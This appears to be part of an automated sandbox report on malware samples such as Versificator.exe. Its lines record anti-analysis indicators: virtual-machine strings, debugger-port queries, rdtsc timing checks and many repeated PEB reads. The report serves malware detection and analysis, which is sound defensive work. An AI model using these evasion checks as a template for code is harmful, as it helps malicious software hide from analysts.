            Source: svchost.exe, 00000004.00000002.2121354912.0000025525054000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916473747.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056CD000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\textless.exe; API call chain: ExitProcess graph end node (graph_0-3317)
            Source: C:\Users\user\Desktop\textless.exe; API call chain: ExitProcess graph end node (graph_0-3474)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Process queried: DebugPort (2 occurrences)
            Source: C:\Windows\SysWOW64\logman.exe; Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2127096E rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_07437908 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21260124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212F0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21304164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21304164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21236154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21236154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21270185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_213061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2122C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2125C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_21232050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_212280A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C80A8 mov eax, dword ptr fs:[00000030h]11_2_212C80A8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F60B8 mov eax, dword ptr fs:[00000030h]11_2_212F60B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F60B8 mov ecx, dword ptr fs:[00000030h]11_2_212F60B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123208A mov eax, dword ptr fs:[00000030h]11_2_2123208A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A0E3 mov ecx, dword ptr fs:[00000030h]11_2_2122A0E3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212380E9 mov eax, dword ptr fs:[00000030h]11_2_212380E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B60E0 mov eax, dword ptr fs:[00000030h]11_2_212B60E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C0F0 mov eax, dword ptr fs:[00000030h]11_2_2122C0F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212720F0 mov ecx, dword ptr fs:[00000030h]11_2_212720F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B20DE mov eax, dword ptr fs:[00000030h]11_2_212B20DE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C310 mov ecx, dword ptr fs:[00000030h]11_2_2122C310
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21250310 mov ecx, dword ptr fs:[00000030h]11_2_21250310
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D437C mov eax, dword ptr fs:[00000030h]11_2_212D437C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov ecx, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FA352 mov eax, dword ptr fs:[00000030h]11_2_212FA352
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D8350 mov ecx, dword ptr fs:[00000030h]11_2_212D8350
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130634F mov eax, dword ptr fs:[00000030h]11_2_2130634F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125438F mov eax, dword ptr fs:[00000030h]11_2_2125438F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125438F mov eax, dword ptr fs:[00000030h]11_2_2125438F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212663FF mov eax, dword ptr fs:[00000030h]11_2_212663FF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EC3CD mov eax, dword ptr fs:[00000030h]11_2_212EC3CD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B63C0 mov eax, dword ptr fs:[00000030h]11_2_212B63C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov ecx, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D43D4 mov eax, dword ptr fs:[00000030h]11_2_212D43D4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D43D4 mov eax, dword ptr fs:[00000030h]11_2_212D43D4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122823B mov eax, dword ptr fs:[00000030h]11_2_2122823B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122826B mov eax, dword ptr fs:[00000030h]11_2_2122826B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B8243 mov eax, dword ptr fs:[00000030h]11_2_212B8243
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B8243 mov ecx, dword ptr fs:[00000030h]11_2_212B8243
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130625D mov eax, dword ptr fs:[00000030h]11_2_2130625D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A250 mov eax, dword ptr fs:[00000030h]11_2_2122A250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236259 mov eax, dword ptr fs:[00000030h]11_2_21236259
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA250 mov eax, dword ptr fs:[00000030h]11_2_212EA250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA250 mov eax, dword ptr fs:[00000030h]11_2_212EA250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402A0 mov eax, dword ptr fs:[00000030h]11_2_212402A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402A0 mov eax, dword ptr fs:[00000030h]11_2_212402A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov ecx, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E284 mov eax, dword ptr fs:[00000030h]11_2_2126E284
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E284 mov eax, dword ptr fs:[00000030h]11_2_2126E284
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213062D6 mov eax, dword ptr fs:[00000030h]11_2_213062D6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6500 mov eax, dword ptr fs:[00000030h]11_2_212C6500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
